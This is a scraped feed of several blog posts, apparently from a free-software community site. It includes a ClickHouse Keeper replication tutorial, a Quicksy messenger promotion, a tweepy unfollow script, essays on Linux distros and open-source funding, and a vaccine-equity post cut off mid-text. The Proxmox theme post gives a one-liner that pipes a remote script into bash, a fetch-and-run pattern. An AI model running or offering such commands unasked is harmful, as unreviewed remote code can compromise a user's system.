of Quicksy:\nAvailable on F-Droid and Play Store.\nQuicksy supports encryption by default and due to software code being available, we can verify that it does encrypt messages (without any cheating!). Encryption means only the users exchanging messages can read them. Quicksy respects users privacy in this way. The Quicksy server cannot read your messages.\nOMEMO Encryption in Quicksy app.\n\n\nVery good video\u002Faudio call support.\nVideo calling in Quicksy app. Credits: F-Droid Quicksy page\n\n\nSharing of photos\u002Fvideos\u002Fvoice message, in encrypted form.\nSharing pictures in Quicksy app.\n\n\n\nIf any of your contacts register with Quicksy service, then Quicksy automatically detects and shows them in your Quicksy contact list.\nThere are many apps and services compatible with Quicksy, like Conversations, Blabber, Monal etc and therefore, you are not locked into one service provider, unlike WhatsApp, Telegram, Signal.\nOne server goes down does not imply that the whole XMPP communications goes down. This is due to the decentralized nature of XMPP which Quicksy is a part of.\nEasy migration: If Quicksy does something in future that you do not agree with, you can just use another XMPP service and still be able to talk to your contacts.\nWhy is Quicksy different?\nPopular messenger apps like WhatsApp, Telegram and Signal have problems that users do not control them. For details, please check this article. WhatsApp uses the control over its users to put them under surveillance. Telegram and Signal are free software but centralized. WhatsApp is nonfree software as well as centralized. Centralized services are easily suspectible to backdoors, can be compromised later on due to change of privacy policy or terms and conditions, are easily for government to ban etc. The owner of the platform dictates the decisions of a centralized system, so even if it is good for now, it cannot be trusted to remain good forever.\nQuicksy is free\u002Fswatantra\u002Fmukt\u002Flibre software (‘free’ as in freedom) and therefore users can inspect, modify and share the software. If users want to add a feature, fix a problem with the software, they don’t have to beg the developer. In other words, the software is under user’s control.\nQuicksy is a part of XMPP protocol which decentralized and federated. To understand federation, we give example of mobile telecom operators. A person using a BSNL SIM can talk to a user having Vodafone SIM, by call and SMS. WhatsApp, Telegram and Signal do not give you that freedom. Your all the contacts need to be registered with the same service provider. These apps have a fundamental problem of vendor lock-in – that if you uninstall WhatsApp, for example, you lose all your contacts. With federation, it is like changing SIM. If you have a problem with a telecom operator and you buy a new SIM of another company, you do not lose all your contacts. You can still call and message your earlier contacts. This way we can control our communications rather than relying on a single entity for our communications.\nLet’s choose Quicksy for a free society rather than being locked by WhatsApp, Telegram or Signal.\nA word for Free Software Community\nDear Free Software Community, let’s raise awareness about Quicksy. We don’t have to recommend our geeky solutions to everyone. If some people switch to free software, decentralized and federated app like Quicksy, that is better compared to them finding xmpp\u002Fmatrix\u002FIRC difficult to use and not using it. We need to work to advertise this option and raise awareness about it.\nFurther Reading:\nIntroduction to Free Software.\nWhy Free Software and decentralization are necessary for privacy.\nWhatsApp is malware.\nWhat Does The Facebook Outage Teach Us.\nChoosing a privacy-respecting chatting app.\nReclaim privacy in instant messaging with Free Software and choice of service providers.",[],{"slug":1816,"title":1817,"link":1818,"pubDate":1819,"contentSnippet":1820,"tags":1821,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"clickhouse-replication","Using ClickHouse Keeper for Replication","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fclickhouse-replication\u002F","2021-12-17T02:40:55.000Z","ClickHouse is an extremely performant columnar DB used for fast analytical processing. ClickHouse supports data replication using Apache Zookeeper which needs to be deployed externally. While Zookeeper works well after you’ve tuned it properly, it was still an additional maintenance overhead. The good news is that you don’t have to worry about this anymore.\nClickHouse 21.12 release annoucement mentions ClickHouse Keeper as feature complete. Keeper is a replacement for Zookeeper, written in C++ and uses the RAFT algorithm for consensus across different nodes in the cluster. It also has some nice improvements over Zookeeper, such as compressed snapshots\u002Flogs of the state changes in the cluster and the ability to run it inside the server binary itself. I decided to spin up a local Clickhouse cluster and test out the new clickhouse-keeper feature.\nFor our local setup, we’ll set up 4 nodes. We’ll create 2 shards to distribute our data and each shard will have 2 replicas each. The setup looks something like this:\n\nWe need to run clickhouse-keeper only on 3 of these nodes to ensure a quorum. Here’s a sample docker-compose.yml to spin up these nodes as containers:\nversion: \"3.7\"\n\nx-clickhouse-defaults: &clickhouse-defaults\n  restart: unless-stopped\n  image: yandex\u002Fclickhouse-server:21.12.2.17\n  ulimits:\n    nproc: 65535\n    nofile:\n      soft: 262144\n      hard: 262144\n\nservices:\n  clickhouse-blue-1:\n    \u003C\u003C: *clickhouse-defaults\n    container_name: clickhouse-blue-1\n    hostname: clickhouse-blue-1\n    ports:\n      - 9000:9000\n      - 8123:8123\n      - 9181:9181\n    volumes:\n      - type: volume\n        source: ch-blue-1-data\n        target: \u002Fvar\u002Flib\u002Fclickhouse\n      - \".\u002Fconfigs\u002Fgen\u002Fclickhouse-blue-1:\u002Fetc\u002Fclickhouse-server\u002Fconfig.d\u002F\"\n\n  clickhouse-blue-2:\n    \u003C\u003C: *clickhouse-defaults\n    container_name: clickhouse-blue-2\n    hostname: clickhouse-blue-2\n    ports:\n      - 9001:9000\n      - 8124:8123\n      - 9182:9181\n    volumes:\n      - type: volume\n        source: ch-blue-2-data\n        target: \u002Fvar\u002Flib\u002Fclickhouse\n      - \".\u002Fconfigs\u002Fgen\u002Fclickhouse-blue-2:\u002Fetc\u002Fclickhouse-server\u002Fconfig.d\u002F\"\n\n  clickhouse-green-1:\n    \u003C\u003C: *clickhouse-defaults\n    container_name: clickhouse-green-1\n    hostname: clickhouse-green-1\n    ports:\n      - 9002:9000\n      - 8125:8123\n      - 9183:9181\n    volumes:\n      - type: volume\n        source: ch-green-1-data\n        target: \u002Fvar\u002Flib\u002Fclickhouse\n      - \".\u002Fconfigs\u002Fgen\u002Fclickhouse-green-1:\u002Fetc\u002Fclickhouse-server\u002Fconfig.d\u002F\"\n\n  clickhouse-green-2:\n    \u003C\u003C: *clickhouse-defaults\n    container_name: clickhouse-green-2\n    hostname: clickhouse-green-2\n    ports:\n      - 9003:9000\n      - 8126:8123\n      - 9184:9181\n    volumes:\n      - type: volume\n        source: ch-green-2-data\n        target: \u002Fvar\u002Flib\u002Fclickhouse\n      - \".\u002Fconfigs\u002Fgen\u002Fclickhouse-green-2:\u002Fetc\u002Fclickhouse-server\u002Fconfig.d\u002F\"\n\nvolumes:\n  ch-blue-1-data:\n  ch-blue-2-data:\n  ch-green-1-data:\n  ch-green-2-data:\nclickhouse-keeper runs only if the \u003Ckeeper_config> section is present inside the config. Here’s a sample config:\n\u003Cclickhouse>\n    \u003Ckeeper_server>\n        \u003Ctcp_port>9181\u003C\u002Ftcp_port>\n        \u003Cserver_id>${SERVER_ID}\u003C\u002Fserver_id>\n        \u003Clog_storage_path>\u002Fvar\u002Flib\u002Fclickhouse\u002Fcoordination\u002Flog\u003C\u002Flog_storage_path>\n        \u003Csnapshot_storage_path>\u002Fvar\u002Flib\u002Fclickhouse\u002Fcoordination\u002Fsnapshots\u003C\u002Fsnapshot_storage_path>\n\n        \u003Ccoordination_settings>\n            \u003Coperation_timeout_ms>10000\u003C\u002Foperation_timeout_ms>\n            \u003Csession_timeout_ms>30000\u003C\u002Fsession_timeout_ms>\n            \u003Craft_logs_level>trace\u003C\u002Fraft_logs_level>\n        \u003C\u002Fcoordination_settings>\n\n        \u003Craft_configuration>\n            \u003Cserver>\n                \u003Cid>1\u003C\u002Fid>\n                \u003Chostname>clickhouse-blue-1\u003C\u002Fhostname>\n                \u003Cport>9234\u003C\u002Fport>\n            \u003C\u002Fserver>\n            \u003Cserver>\n                \u003Cid>2\u003C\u002Fid>\n                \u003Chostname>clickhouse-blue-2\u003C\u002Fhostname>\n                \u003Cport>9234\u003C\u002Fport>\n            \u003C\u002Fserver>\n            \u003Cserver>\n                \u003Cid>3\u003C\u002Fid>\n                \u003Chostname>clickhouse-green-1\u003C\u002Fhostname>\n                \u003Cport>9234\u003C\u002Fport>\n            \u003C\u002Fserver>\n        \u003C\u002Fraft_configuration>\n    \u003C\u002Fkeeper_server>\n\u003C\u002Fclickhouse>\nThere are some other configs required for Clickhouse to discover other nodes and enable replication. You can find a working example in this repo.\nVerifying Cluster State#\nOnce the containers are configured and running, we can verify if the replication is working as intended:\nLet’s first check if the keeper daemon is running by:\necho ruok | nc 127.0.0.1 9181\nimok\nruok is a part of Four Letter Commands that are mostly used to diagnose Keeper’s client\u002Fserver.\nTo ensure that clickhouse-server is aware of the keeper cluster, we can query the system.zookeeper table:\nSELECT *\nFROM system.zookeeper\nWHERE path = '\u002F'\nFORMAT Vertical\n\nQuery id: 287d3c2d-b93f-4d48-b335-6df2f89a8ab3\n\nRow 1:\n──────\nname:           clickhouse\nvalue:          \nczxid:          3\nmzxid:          3\nctime:          2021-12-17 09:11:05\nmtime:          2021-12-17 09:11:05\nversion:        0\ncversion:       1\naversion:       0\nephemeralOwner: 0\ndataLength:     0\nnumChildren:    1\npzxid:          4\npath:           \u002F\nIf you don’t see any results in the system.zookeeper table, then re-check if zookeeper section is present inside the config. This config tells ClickHouse how to discover keeper nodes.\nWe can also see if our cluster is configured correctly with:\nSELECT\n    host_name,\n    host_address,\n    replica_num\nFROM system.clusters\nWHERE cluster = 'events'\n\nQuery id: a4bacfa1-d3aa-482f-b8b2-30b05442a173\n\n┌─host_name──────────┬─host_address─┬─replica_num─┐\n│ clickhouse-blue-1  │ 172.19.0.5   │           1 │\n│ clickhouse-blue-2  │ 172.19.0.3   │           2 │\n│ clickhouse-green-1 │ 172.19.0.4   │           1 │\n│ clickhouse-green-2 │ 172.19.0.2   │           2 │\n└────────────────────┴──────────────┴─────────────┘\n(Here events is our cluster name specified in the remote_servers section of the config.)\nInserting Sample Data#\nLet’s create a DB and add some data to the DB. We need to ensure that our data is split across shards and we can query all shards using a central view.\nCluster Schema#\nCREATE DATABASE app ON CLUSTER 'events';\n\nCREATE TABLE app.events_local ON CLUSTER '{cluster}' (\n    time DateTime,\n    event_id  Int32,\n    uuid UUID\n)\nENGINE = ReplicatedMergeTree('\u002Fclickhouse\u002Ftables\u002F{cluster}\u002F{shard}\u002F{table}', '{replica}')\nPARTITION BY toYYYYMM(time)\nORDER BY (event_id);\n\nCREATE TABLE app.events_main ON CLUSTER '{cluster}' AS app.events_local\nENGINE = Distributed('{cluster}', app, events_local, rand());\nWhat’s happening here:\nWe’ll create a sample database app with a single table events_local.\nWe’re using ReplicatedMergeTree here as that tells ClickHouse to automatically replicate the data inside the table when it’s inserted.\n\nProperties like cluster\u002Fshard\u002Freplica are automatically populated from the server’s macros. It’s a handy feature that allows you to execute this command just once on the cluster and it automatically populates the relevant config in each server.\nFinally we create a  Distributed table to perform our INSERT\u002FSELECT operations in a central place. It’s possible to manually insert data to particular replicas, but since Clickhouse supports load balancing across shards, it’s preferred to create a table with a Distributed engine and let that happen automatically.\n\nWrite operations can be sharded based on a particular column name, but here we are simply using the rand() function, which splits the write randomly to different shards.\nAll read operations are parallelized and Clickhouse selects one replica from each shard to query the data from.\nWe use ON CLUSTER keyword to indicate that this query has to be run on all servers which are part of the cluster events.\nIt’s now time to insert some random data, for which you can use this command:\nINSERT INTO app.events_main VALUES (now(), rand(1), generateUUIDv4());\nWe can now query the table and see if our records are present:\nSELECT *\nFROM app.events_main\n\n┌────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ 2021-12-17 09:36:17 │ 1888949839 │ 3c33305e-8ea0-4ac1-a07a-667465ec9a85 │\n└─────────────────────┴────────────┴──────────────────────────────────────┘\n┌────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ 2021-12-17 09:36:16 │ -689113926 │ 2a944d71-73f3-4491-b851-4f0e6f296e44 │\n└─────────────────────┴────────────┴──────────────────────────────────────┘\n┌────────────────time─┬──event_id─┬─uuid─────────────────────────────────┐\n│ 2021-12-17 09:36:15 │ 415899002 │ 5980299f-1594-4c17-8eb5-e512f15ecf34 │\n└─────────────────────┴───────────┴──────────────────────────────────────┘\n┌────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ 2021-12-17 09:36:16 │ 1303963476 │ 0b27d5bd-6315-4937-82a4-18199e5eebb7 │\n└─────────────────────┴────────────┴──────────────────────────────────────┘\nNow, you must be wondering how to check if the data is replicated and how the data is distributed across our shards. For that, we can use the handy remote() function:\nSELECT *\nFROM\n(\n    SELECT\n        hostName(),\n        *\n    FROM remote('172.20.0.2', 'app', 'events_local')\n    UNION ALL\n    SELECT\n        hostName(),\n        *\n    FROM remote('172.20.0.3', 'app', 'events_local')\n    UNION ALL\n    SELECT\n        hostName(),\n        *\n    FROM remote('172.20.0.4', 'app', 'events_local')\n    UNION ALL\n    SELECT\n        hostName(),\n        *\n    FROM remote('172.20.0.5', 'app', 'events_local')\n)\n\nQuery id: 34a81447-a31b-4915-9bd8-7a6e17bb0860\n\n┌─hostName()────────┬────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-blue-2 │ 2021-12-17 09:36:17 │ 1888949839 │ 3c33305e-8ea0-4ac1-a07a-667465ec9a85 │\n└───────────────────┴─────────────────────┴────────────┴──────────────────────────────────────┘\n┌─hostName()────────┬────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-blue-1 │ 2021-12-17 09:36:17 │ 1888949839 │ 3c33305e-8ea0-4ac1-a07a-667465ec9a85 │\n└───────────────────┴─────────────────────┴────────────┴──────────────────────────────────────┘\n┌─hostName()─────────┬────────────────time─┬──event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-green-2 │ 2021-12-17 09:36:15 │ 415899002 │ 5980299f-1594-4c17-8eb5-e512f15ecf34 │\n└────────────────────┴─────────────────────┴───────────┴──────────────────────────────────────┘\n┌─hostName()─────────┬────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-green-2 │ 2021-12-17 09:36:16 │ -689113926 │ 2a944d71-73f3-4491-b851-4f0e6f296e44 │\n└────────────────────┴─────────────────────┴────────────┴──────────────────────────────────────┘\n┌─hostName()─────────┬────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-green-2 │ 2021-12-17 09:36:16 │ 1303963476 │ 0b27d5bd-6315-4937-82a4-18199e5eebb7 │\n└────────────────────┴─────────────────────┴────────────┴──────────────────────────────────────┘\n┌─hostName()─────────┬────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-green-1 │ 2021-12-17 09:36:16 │ 1303963476 │ 0b27d5bd-6315-4937-82a4-18199e5eebb7 │\n└────────────────────┴─────────────────────┴────────────┴──────────────────────────────────────┘\n┌─hostName()─────────┬────────────────time─┬──event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-green-1 │ 2021-12-17 09:36:15 │ 415899002 │ 5980299f-1594-4c17-8eb5-e512f15ecf34 │\n└────────────────────┴─────────────────────┴───────────┴──────────────────────────────────────┘\n┌─hostName()─────────┬────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-green-1 │ 2021-12-17 09:36:16 │ -689113926 │ 2a944d71-73f3-4491-b851-4f0e6f296e44 │\n└────────────────────┴─────────────────────┴────────────┴──────────────────────────────────────┘\nPerfect! We can see our data is sharded as some parts of it exists in green and blue. We can also see that for each record, we have 2 entries thus confirming that ReplicatedMergeTree is doing its job!\nAdditional Scenarios#\nAll is well and good so far, but to ensure that our cluster setup is resilient we need to introduce our cluster to some Non-Happy scenarios.\nStop a replica node#\n\n❯ docker-compose stop clickhouse-green-2 \nStopping clickhouse-green-2 ... done\nNow, let’s query our records:\nSELECT count(*)\nFROM app.events_main\n\n┌─count()─┐\n│       4 │\n└─────────┘\nThat seems right. We’re able to access all our data with just one replica down.\nLet’s try inserting data and bring back the replica to see if it got automatically replicated or not:\nINSERT INTO app.events_main VALUES (now(), rand(1), generateUUIDv4());\n\nOk.\nSELECT *\nFROM app.events_main\nORDER BY time DESC\nLIMIT 1\n\n┌────────────────time─┬──event_id─┬─uuid─────────────────────────────────┐\n│ 2021-12-17 10:09:10 │ 375826335 │ 8dbbc9cf-8f00-4cc3-a4fb-0f17a68340e5 │\n└─────────────────────┴───────────┴──────────────────────────────────────┘\nLet’s start the replica again:\n❯ docker-compose start clickhouse-green-2\nStarting clickhouse-green-2 ... done\nOn querying the replica to see if it has the data:\nSELECT\n    hostName(),\n    *\nFROM remote('172.20.0.5', 'app', 'events_local')\nORDER BY time DESC\nLIMIT 1\n\nQuery id: 422041dc-afe8-4f28-9659-6d58726f8c90\n\n┌─hostName()─────────┬────────────────time─┬──event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-green-2 │ 2021-12-17 10:09:10 │ 375826335 │ 8dbbc9cf-8f00-4cc3-a4fb-0f17a68340e5 │\n└────────────────────┴─────────────────────┴───────────┴──────────────────────────────────────┘\nPerfect! The record 375826335 automatically got replicated once the replica was healthy.\nStop a Keeper Node#\n\nWe’ll stop a server instance that is running the clickhouse-keeper process. By doing this, we’ll also be killing a replica, but that is okay.\n❯ docker-compose stop clickhouse-blue-2\nStopping clickhouse-blue-2 ... done\nLet’s insert some data:\nINSERT INTO app.events_main VALUES (now(), rand(1), generateUUIDv4());\n\nOk\nWe can check the server information of the other 2 keeper nodes:\n$ echo stat | nc 127.0.0.1 9181 | grep Mode\nMode: follower\n$ echo stat | nc 127.0.0.1 9183 | grep Mode\nMode: leader\nSo, one of the keeper nodes has elected itself to be the leader and we have no problems in the setup so far. However, if we stop another keeper node, then there will be only keeper node remaining in the setup and to avoid a Split Brain issue, it won’t be able to elect itself as the leader.\n\nWhat happens then? Only one way to find out:\n❯ docker-compose stop clickhouse-blue-1\nStopping clickhouse-blue-1 ... done\nINSERT INTO app.events_main VALUES (now(), rand(1), generateUUIDv4());\n\nReceived exception from server (version 21.12.2):\nCode: 242. DB::Exception: Received from localhost:9000. DB::Exception: Table is in readonly mode (zookeeper path: \u002Fclickhouse\u002Ftables\u002Fevents\u002Fgreen\u002Ftable). (TABLE_IS_READ_ONLY)\nAh! So, we can still query for the data (which will be incomplete since blue shard is completely down), but we cannot insert any new data at all. We can even verify this by querying for the health of the keeper node:\n$ echo mntr | nc localhost 9183            \nThis instance is not currently serving requests%                                                                                                                              \nAdd a new shard#\n\nAlright, so our tests so far have been quite good and show that the cluster is resilient to failures as long as there exists a keeper node running as leader mode in the quorum. Now, let’s see how to add a new shard. We’ll extend our docker-compose.yml to add a new orange shard:\n  clickhouse-orange-1:\n    \u003C\u003C: *clickhouse-defaults\n    container_name: clickhouse-orange-1\n    hostname: clickhouse-orange-1\n    ports:\n      - 9004:9000\n      - 8127:8123\n      - 9185:9181\n    volumes:\n      - type: volume\n        source: ch-orange-1-data\n        target: \u002Fvar\u002Flib\u002Fclickhouse\n      - \".\u002Fconfigs\u002Fgen\u002Fclickhouse-orange-1:\u002Fetc\u002Fclickhouse-server\u002Fconfig.d\u002F\"\nInside our remote_servers.xml, we’ll add the orange shard as well:\n \u003Cshard>\n     \u003Cinternal_replication>true\u003C\u002Finternal_replication>\n     \u003Creplica>\n         \u003Chost>clickhouse-orange-1\u003C\u002Fhost>\n         \u003Cport>9000\u003C\u002Fport>\n     \u003C\u002Freplica>\n \u003C\u002Fshard>\nThat’s pretty much it. Let’s start the new replica:\ndocker-compose up\nLet’s insert some data and query if the shard is getting data or not:\nSELECT\n    hostName(),\n    *\nFROM remote('172.20.0.2', 'app', 'events_local')\n\nReceived exception from server (version 21.12.2):\nCode: 519. DB::Exception: Received from localhost:9000. DB::Exception: All attempts to get table structure failed. Log: \n\nCode: 279. DB::NetException: All connection tries failed. Log: \n\nThere is no table `app`.`events_local` on server: 172.20.0.2:9000\n\n. (ALL_CONNECTION_TRIES_FAILED) (version 21.12.2.17 (official build))\n\n. (NO_REMOTE_SHARD_AVAILABLE)\nHouston, we have a problem.\n> There is no table `app`.`events_local` on server: 172.20.0.2:9000\nThis is mentioned in the ClickHouse docs on Replication:\nCREATE, DROP, ATTACH, DETACH and RENAME queries are executed on a single server and are not replicated:\nThis means that although we’d run CREATE DATABASE and CREATE TABLE commands using ON CLUSTER which executes on all servers, but since the orange-1 node is introduced after we ran that command, we need to manually create the DB and Table here. We have to execute the below commands inside the orange-1 replica:\nCREATE DATABASE app;\n\nCREATE TABLE app.events_local (\n    time DateTime,\n    event_id  Int32,\n    uuid UUID\n)\nENGINE = ReplicatedMergeTree('\u002Fclickhouse\u002Ftables\u002F{cluster}\u002F{shard}\u002F{table}', '{replica}')\nPARTITION BY toYYYYMM(time)\nORDER BY (event_id);\nThat’s all that is required. Adding a new replica is also the same process.\nSummary#\nHope this tutorial helped you figure out how to use clickhouse-keeper to set up a distributed ClickHouse cluster DB. clickhouse-keeper is still a relatively new feature as the docs mention already, but given that it solves operations overhead of running a Zookeeper cluster, it’s worth checking it out.\nReferences#\nhttps:\u002F\u002Fwww.youtube.com\u002Fwatch?v=abhcCRW09Ac\n\nSlides used in above talk: https:\u002F\u002Fpresentations.clickhouse.com\u002Fmeetup54\u002Fkeeper.pdf\nhttps:\u002F\u002Fclickhouse.com\u002Fdocs\u002Fen\u002Foperations\u002Fclickhouse-keeper\nhttps:\u002F\u002Fgithub.com\u002FClickHouse\u002FClickHouse\u002Ftree\u002Fmaster\u002Ftests\u002Fintegration\u002Ftest_keeper_multinode_simple\nhttps:\u002F\u002Fgithub.com\u002FClickHouse\u002FClickHouse\u002Fissues\u002F2161\nFor the full code\u002Fconfig samples, you can check out the repo.\nFin!\nUpdates#\nIf you have setup RBAC on your cluster, make sure you add \u003Cuser> and \u003Cpassword> fields to the \u003Cremote_server> configuration.",[],{"slug":1823,"title":1824,"link":1825,"pubDate":1826,"contentSnippet":1827,"tags":1828,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"open-source-is-not-broken","\"Open source\" is not broken","https:\u002F\u002Fnadh.in\u002Fblog\u002Fopen-source-is-not-broken\u002F","Sun, 12 Dec 2021 00:00:00 +0000","I read this article (“Open Source” is Broken by Xe) written in the aftermath of the unfortunate log4j2 fiasco. The author discusses a pertinent problem that has plagued the FOSS (Free and Open Source) world ever since large for-profit corporations started their widespread consumption of FOSS, ever since countless “unicorns” raised infinite amounts of funding on valuations built pretty much entirely on FOSS, ever since FOSS got co-opted into corporatisation and capitalisation. And yet, countless maintainers of critical and widely used FOSS struggle to make a living.",[],{"slug":1830,"title":1831,"link":1832,"pubDate":1833,"contentSnippet":1834,"tags":1835,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"proxmox-discord","Dark Mode for Proxmox","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fproxmox-discord\u002F","Fri, 10 Dec 2021 15:12:24 +0530","How to make proxmox UI beautiful I use proxmox daily for virtual machines and LCX containers, It is one of the best virtual machince platform that utilizes KVM And it’s FOSS but the default UI is too bright and I prefer darker themes\nDiscord-PVE Discord-PVE is a discord theme for the proxmox virtual environment it uses custom stylesheet.\nTo Install it: run this oneliner\nbash \u003C(curl -s https:\u002F\u002Fraw.githubusercontent.com\u002FWeilbyte\u002FPVEDiscordDark\u002Fmaster\u002FPVEDiscordDark.sh ) install This looks soo much better https:\u002F\u002Fgithub.",[],{"slug":1837,"title":1838,"link":1839,"pubDate":1833,"contentSnippet":1840,"tags":1841,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"dns-docker","Setting DNS for containers in a docker environment","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fdns-docker\u002F","Setting DNS in a docker environment I have a DNS resolver running on my homeserver (adguard home) which also acts as an adblocker. But the host firewall is configured to only accept traffic from my home LAN (10.0.1.0\u002F24) The containers meanwhile are isolated and do not share the same IP range as my LAN, this leads to DNS queries failing inside the containers. I have noticed that all my containers default to 8.",[],{"slug":1843,"title":1844,"link":1845,"pubDate":1846,"contentSnippet":1847,"tags":1848,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"breaking-software","Breaking Software and Getting Older","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbreaking-software\u002F","2021-12-09T02:40:55.000Z","Recently, I’d posted on Twitter that my feed has become messy overtime. Maybe I followed some accounts that were of no interest, maybe Twitter’s algos don’t really know what to show to me. Whatever, I wanted a fresh start. And, I’ve done this in past. I’ve removed all the accounts that I follow but they don’t follow me back. This little trick is helpful to start afresh while still not offending your friends ;)\n\nI’d written a really simple Python script to do the job! It looks like:\nimport tweepy\n\nSCREEN_NAME = 'mrkaran_'\nCONSUMER_KEY = ''\nCONSUMER_SECRET = ''\nACCESS_TOKEN = ''\nACCESS_TOKEN_SECRET = ''\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\napi = tweepy.API(auth)\n\nfollowers = api.followers_ids(SCREEN_NAME)\nfriends = api.friends_ids(SCREEN_NAME)\n\nfor f in friends:\n    if f not in followers:\n        print(\"Unfollow {0}?\".format(api.get_user(f).screen_name))\n        api.destroy_friendship(f)\nI’d last ran this in 2019 or so. That is dinosaur ages in the world of software. All I wanted to do was run this goddamn script again, 2 years later. Seems to be too much of an ask? Apparently tweepy the library used here to interact with Twitter’s APIs had a major release with lots of breaking changes. They’ve internally migrated to start using v2 Twitter API. So, when I naively ran pip install tweepy, my code threw:\n❯ python main.py    \nTraceback (most recent call last):\n  File \"\u002Fhome\u002Fkaran\u002FCode\u002FPersonal\u002Ftwitter-unfollow\u002Fmain.py\", line 13, in \u003Cmodule>\n    followers = api.followers_ids(SCREEN_NAME)\nAttributeError: 'API' object has no attribute 'followers_ids'\nSo, some method name changed. But that’s not all. The whole auth process including the initialisation of the API object changed as well. I’d spent some ~15 minutes grokking the docs but frustrated because 1) I don’t give a shit about v2\u002Fv1 APIs. 2) I just want to carry on with whatever I was doing. Why is this shit taking more time than I can care to give this to?\nI’d have cared enough if it was a side-project I maintained or something that I used daily. A utility like this which gets used once in a couple of years, will see more such breaking changes in future. Why, then should I spend migrating to v2 APIs, when after 2 years, v3 APIs would have broken my code again? What is the damn point? Why can’t software just keep working without troubling their users?\nIn the end, I just installed the last version that works with v1 APIs and ran the script.\nI get breaking changes, I totally do. And I’ve no qualms with Tweepy. They did what they had to, in order to be compatible with v2. I am just angry\u002Fsad at the whole ecosystem of “Move fast, break things”.\nPlease. Slow. Down.\nSo that the rest of us who have a life can enjoy it and not spend an entire weekend migrating across versions!\nSigh",[],{"slug":1850,"title":1851,"link":1852,"pubDate":1853,"contentSnippet":1854,"tags":1855,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"choosing-distro","How I choose my distros","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fchoosing-distro\u002F","Tue, 07 Dec 2021 00:00:00 +0000","If you don’t know what a distro is, I will explain that in a minute.\nFirst, I would like to ask you a question\nWhich operating system do you use?\nDo you use Microsoft Windows?\nDo you use MacOS?\nor do you use Ubuntu?\nWhy do you use whatever you use?\nIn this post, I will share the reasoning behind choosing the operating systems I use and why it matters.\nWhat is a distro? There are many operating systems known as GNU\u002FLinux (actually they are known erroneously as “Linux”, please read this article for an explanation of why we call it GNU\u002FLinux and not Linux). The members of the family of GNU\u002FLinux systems are called distros.\nI don’t use Microsoft Windows and MacOS because they are nonfree\u002Fproprietary software. And the symptoms of them being nonfree software are that they are malware and mistreat their users in many ways.\nI do not want to use any nonfree software. So, for example, Ubuntu has nonfree software in its repositories and the version of Linux, the kernel, included in Ubuntu contains firmware blobs. That is not an ideal distro I would like to run.\nRight now, I am using PureOS because it does not have any nonfree software in its repositories, does not ship with any nonfree firmware, follows Free System Distribution Guidelines (GNU FSDG) and so it is a GNU\u002FFSF endorsed distro. Also, PureOS is ideologically inclined towards Free Software and values user’s freedom and privacy.\nFurther, PureOS is maintained by Purism, a company which is very committed to freedom and privacy of users. Purism is developing hardware, like mobile phones and laptops, which can run exclusively on fully free software. I support their work and when I say I use PureOS to someone, they might want to search about it and so it will raise awareness about Purism and their work.\nAnother distribution I use and endorse is Debian GNU\u002FLinux as it does not ship with any nonfree firmware, it does not have any nonfree packages in its main repositories. I know GNU does not endorse Debian, but I think Debian is a good freedom-respecting distro. Like PureOS, Debian is also ideologically inclined towards free software philosophy. Debian adheres to Debian Social Contract as well which is committed to free software. Plus Debian has an inclusive community which is very welcoming to all. The decision-making of Debian Community is democratic in nature.\nFurther, I occassionally use other distros endorsed by GNU because they are committed to Free SOftware philosophy and contain no nonfree\u002Fproprietary software by default.\nSummarizing the above discussion, I choose distros if they match the following criteria:\nIt should respect my freedom and privacy;\nIt should be ideologically inclined to free software philosophy.\nA distro being a free software is not enough. When I use PureOS, other people will learn about Free Software and Purism. This is not the case with, say, Fedora or Ubuntu as they are not committed to free software (shipping with nonfree firmware by default is one example of this), although the operating systems are themselves Free Software. I suggest you the same if you support free software.",[],{"slug":1857,"title":1858,"link":1859,"pubDate":1860,"contentSnippet":1861,"tags":1862,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"covid-vaccine-profit-over-people","Covid Vaccine- A Case Of Prioritizing Greed Of A Few Over Public Health","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fcovid-vaccine-profit-over-people\u002F","Sat, 04 Dec 2021 00:00:00 +0000","Look at the image below:\nSource: Wikipedia's version of the file uploaded on 3-December-2021 \n\nWhat does the above image illustrate?\nThe image demonstrates how unequal the Covid-19 vaccine distribution has been across the countries.\nQuoting the official data on Covid vaccines,\n54.9% of the world population has received at least one dose of a COVID-19 vaccine.\nOnly 6.2% of people in low-income countries have received at least one dose.\n(on 4th December 2021)\nWhy is it so?\nIs there a scarcity of vaccine units, or is the vaccine being developed at a slow rate?\nNo!\nIn fact, the vaccine production is accelerating, but the wealthy countries are restricting the access intentionally. Also, developed countries have preordered more number of vaccines than they require and there are only a few companies developing these vaccines, which means that people in low-income developing countries may not receive vaccinations from these manufacturers until 2023 or 2024.\nWhy this is so? This is where the profit of Pharmaceutical companies comes in and Bill Gates too.\nBasically, the covid vaccine is patented (Patent is a legal right given to 